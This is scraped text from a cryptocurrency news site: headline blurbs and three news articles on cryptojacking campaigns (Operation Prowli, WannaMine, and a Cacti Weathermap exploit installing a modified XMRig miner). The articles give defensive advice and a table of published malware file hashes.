coin renders

Use our news to inform cryptocurrency trading decisions, stay up-to-date on happenings in the industry, and more!

Ledger Wallet Desktop Edition Launching on July 9
Operation Prowli: GuardiCore Uncovers Large Scale Cryptojacking
GuardiCore, a cloud-based security provider, has uncovered a large-scale attack on vulnerable servers. BlockExplorer reported on the story as it came to light, “Codenamed Operation Prowli, the attack leverages various exploits to redirect web traffic, and to install cryptocurrency mining software on its targets”.

One Firm Is Way Ahead of Wall Street on Bitcoin
The New York Times reports, ” The financial firm, Susquehanna International Group in Bala Cynwyd, Pa., just outside Philadelphia, is one of the largest players in trading traditional investments like stocks, options and exchange traded funds, or E.T.F.s. Over the last two years, the privately owned company has also built up a trading desk of around a dozen people that buys and sells millions of dollars’ worth of Bitcoin and other virtual or cryptocurrencies in private deals.”

Block Explorer’s Tony Spilotro reports, “Cold storage through a hardware wallet such as the Ledger Nano S is among the safest, most secure, and widely recommended way to store crypto assets. However, using a hardware wallet isn’t always straightforward: not all coins are supported, user interfaces are clunky, and users are often required to use multiple apps to interact with different blockchains.”

Lobbyists Cash-in On Bitcoin
In this Politico money podcast, reporters examine how lobbyists cash in on bitcoin.

Image courtesy of Carty Sewill, http://cartyisme.com/

GuardiCore, a cloud-based security provider, has uncovered a large-scale attack on vulnerable servers. Codenamed Operation Prowli, the attack leverages various exploits to redirect web traffic, and to install cryptocurrency mining software on its targets.

Operation Prowli

Operation Prowli attacks targets with various exploits tailored to specific vulnerabilities. From SSH brute forcing to Mirai-like attacks on consumer modems. Post-infection actions taken include installing cryptocurrency miners and redirecting web traffic. Both post-infection actions performed by Operation Prowli are intended to provide a revenue stream back to those running the attack. At the time of writing, it was reported that over 40,000 computers have fallen victim.

A more in-depth look at the methodology and attacks used by Operation Prowli can be seen in GaurdiCore’s release.

Cryptojacking

Cryptojacking, or stealing computing power from others, allows those behind Operation Prowli to leverage many compromised computers to mine cryptocurrency. As in the last few reports on cryptojacking, the currency of choice for the attackers is Monero, undoubtedly chosen for its commitment to being minable on consumer CPUs and untraceable nature.

Traffic redirection

Once Operation Prowli has managed to gain access to a server, it will attempt to redirect web traffic towards malicious sites. An example used in GaurdiCore’s release is tech support scams.

Prevention and staying secure

For consumers, the best way to stay secure is to verify that the site you have visited is the one you intended. And otherwise to only follow links you trust.

Providers that are not already infected, ensuring your servers are secure can be done in various ways. With the simplest being to use strong passwords, and to only expose to the internet what you absolutely have to. For this reason, firewalls to close ports that do not need to be accessed externally are a must. Otherwise, ensuring that the software you use is up to date, and does not have any longstanding security issues will go a long way.

Otherwise, for providers that are already infected, changing all passwords and doing a security audit is a good first step. After which, stop all currently running malicious processes and remove their binaries (hashes provided below). Or in the case of the traffic redirection attack, check all relevant files for malicious lines.

Filename Hash (sourced from GaurdiCore’s release)
r2r2 128582a05985d80af0c0370df565aec52627ab70dad3672702ffe9bd872f65d8
r2r2-a 09fa626ac488bca48d94c9774d6ae37d9d1d52256c807b6341f0a08bdd722abf
r2r2-m 908a91a707a3a47f9d4514ecdb9e43de861ffa79c40202f0f72b4866fb6c23a6
r345 51f9b87efd00d3c12e4d73524e9626bfeed0f4948781a6f38a7301b102b8dbbd
r345-a cfb8f536c7019d4d04fb90b7dce8d7eefaa6a862a85c523d869912a1fbaf946a
r345-m 88d03f514b2c36e06fd3b7ed6e53c7525a8e8370c4df036b3b96a6da82c8b45b
xm111 b070d06a3615f3db67ad3beab43d6d21f3c88026aa2b4726a93df47145cd30ec
cl1 7e6cadbfad7147d78fae0716cadb9dcb1de7c4a392d8d72551c5301abe11f2b2
z.exe a0a52dc6cf98ad9c9cb244d810a22aa9f36710f21286b5b9a9162c850212b160
pro-wget a09248f3a4d7e58368a1847f235f0ceb52508f29067ad27a36a590dc13df4b42
pro-s2 3e5b3a11276e39821e166b5dbf6414003c1e2ecae3bdca61ab673f23db74734b

 

coin renders

Use our news to inform cryptocurrency trading decisions, stay up-to-date on happenings in the industry, and more!

Twitter CEO Jack Dorsey: Bitcoin Should Be Native Currency of the Internet
Twitter and Square CEO Jack Dorsey stood on stage at the Consensus conference, saying Bitcoin should be the cryptocurrency of the internet.

Adware Bundle Makes Chrome Invisible to Launch Cryptojacking Attacks
ZDNet reports, “CPU usage spikes up to 80 percent on infected machines.”

The SEC Launches Phony ICO Site to Promote Scam Awareness
In a bid to raise awareness of potential investment scams in the cryptocurrency space, BlockExplorer’s Tony Spilotro says the U.S. Securities and Exchange Commission’s (SEC) Office of Investor Education and Advocacy have launched a fake website posing as a luxury travel firm kicking off the pre-sale portion of their initial coin offering (ICO).

Largest Bank in the Philippines Showcases Bitcoin Mining Equipment
The cryptocurrency world is buzzing upon the news The Philippines largest bank is dabbling in Bitcoin. NewsBTC reports, “UnionBank recently demonstrated its cryptocurrency miners at a business conference. That is an interesting development, considering how the world’s leading cryptocurrency is a legal tender in the country.”

PwC China Survey Finds That Most Companies Prefer to Investigate Blockchain Internally
Rebecca Campbell of BlockExplorer reports, “A joint survey by PwC and VeChain has found that most enterprises prefer to setup their own in-house research and development (R&D) teams to investigate the blockchain.”

Image courtesy of Carty Sewill, http://cartyisme.com/

Following the use of the NSA developed EternalBlue exploit in the now infamous ransomware WannaCry, a new malware known as WannaMine has surfaced.

WannaMine follows in the footsteps of WannaCry, using the NSA developed EternalBlue exploit to propagate. After infection, the similarities between WannaCry and WannaMine end. Where WannaCry would proceed to encrypt all available files and notify the user of its existence, WannaMine silently installs and runs mining software for the cryptocurrency Monero.

Use of Monero

This is the next in a line of cryptojacking attacks involving mining software that specifically mines Monero. The reasoning behind the perpetrator’s use of Monero is unknown, though it may have something to do with Monero’s minability on mid to low-end computers, and the privacy that exists on Monero’s blockchain.

Detection

After infection and initial setup, WannaMine uses Windows management tools for its persistence. Once infected, it can be difficult to find the malicious settings within the large number of legitimate ones.

One of the simplest methods of detection is to monitor your computers CPU usage.  Abnormally high CPU usage can be caused by cryptojacking. You can view your CPU usage using Windows Task Manager. Otherwise, high CPU usage will make your computer hotter, which may make its fans run louder.

Prevention

WannaMine uses EternalBlue for its propagation, and as Microsoft patched the vulnerability in 2017, so long as all computers on your network are up-to-date you should be secure from WannaMine. Otherwise, standard security advice such as not following unknown links applies.

 

Cryptojacking – which involves hackers exploiting code vulnerabilities to allow the installation of malicious code into computer programs that are then used to mine for cryptocurrency – has become a widespread phenomenon affecting everyday consumers and major businesses alike. A new report of cryptojacking from cyber-security firm Trend Micro has emerged, that’s among the largest documented yet, resulting in just under $75,000 in Monero to be mined from people’s computers from across the globe.

A vulnerability discovered in the Network Weathermap plugin for Cacti – which is, ironically, an open-source network monitoring tool – was used to infect Linux servers with malware that enables hackers to utilize computer resources to mine for Monero.  Monero is often used in cryptojacking schemes, due to its ease of mining and its privacy-centric design that helps to keep the hijackers anonymous.

This specific cryptojacking campaign is using malicious code dubbed “watchd0g.sh” and is focusing on x86-64 Linux servers in the United States, Japan, Taiwan, China, India, and much of the rest of the world.

Vulnerability “CVE-2013-2618” has had a patch available for nearly five years, and allows the hackers to gain control of code execution on the servers its hosted on, enabling a customized version XMRig to be installed. The hackers have modified XMRig’s open-source code in such a way to avoid detection, by limiting the amount of CPU resources it uses as to not set off any red flags and continue to fly under the radar. The advanced code runs every time the computer is fired up, runs every three minutes, and is designed to automatically re-download itself if deleted.

Trend Micro was able to tie the malicious mining software to two Monero wallets, totaling just under $75,000 in the privacy-focused cryptocurrency. The firm also believes that this campaign is connected to another cryptojacking campaign on Windows computers that resulted in over $3 million in XMR being mined.

Trend Micro explains that users must keep their machines up-to-date with all patches, and that “data from Cacti should be property kept internal to the environment.” Since the vulnerability is so old, many users will unknowingly remain affected. For more technical details on the vulnerability, Trend Micro has a full breakdown on their blog.